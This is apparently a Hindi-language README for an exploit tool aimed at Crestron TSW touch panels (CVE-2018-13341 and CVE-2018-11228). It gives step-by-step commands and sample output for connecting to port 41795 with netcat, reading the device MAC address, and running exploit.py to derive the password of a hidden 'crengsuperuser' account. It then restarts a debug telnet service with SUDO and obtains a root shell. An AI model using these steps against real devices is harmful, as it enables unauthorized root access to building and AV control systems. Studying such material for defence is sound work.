
यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है।
यह उपकरण CVE-2018-13341 का शोषण करने का लक्ष्य रखता है। लक्षित उपकरण के MAC पते का उपयोग करके, आप "crengsuperuser" छिपे खाते का पासवर्ड प्राप्त कर सकते हैं जिसके पास उन्नत विशेषाधिकार हैं और आपको SUDO कमांड चलाने की अनुमति देता है।
TSW-XX60 उपकरण पर पोर्ट 41795 तक पहुँच कर Crestron Toolbox Protocol (CTP) से जुड़ा जा सकता है।
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
इस उपकरण के लिए CryptoGraphy मॉड्यूल आवश्यक है।
# pip3 install cryptography
या
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
CVE-2018-11228 Crestron Terminal Protocol (CTP) में Bash Shell Service के माध्यम से प्रमाणीकरण रहित RCE की अनुमति देता है। "crengsuperuser" छिपे खाते का पासवर्ड प्राप्त करने के बाद आप मशीन पर root पहुँच प्राप्त कर सकते हैं।
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
फिर, एक नए शेल में, आप बॉक्स पर root पहुँच प्राप्त कर सकते हैं।
# telnet w.x.y.z
bash# whoami
root
Credit Goes to : axcheron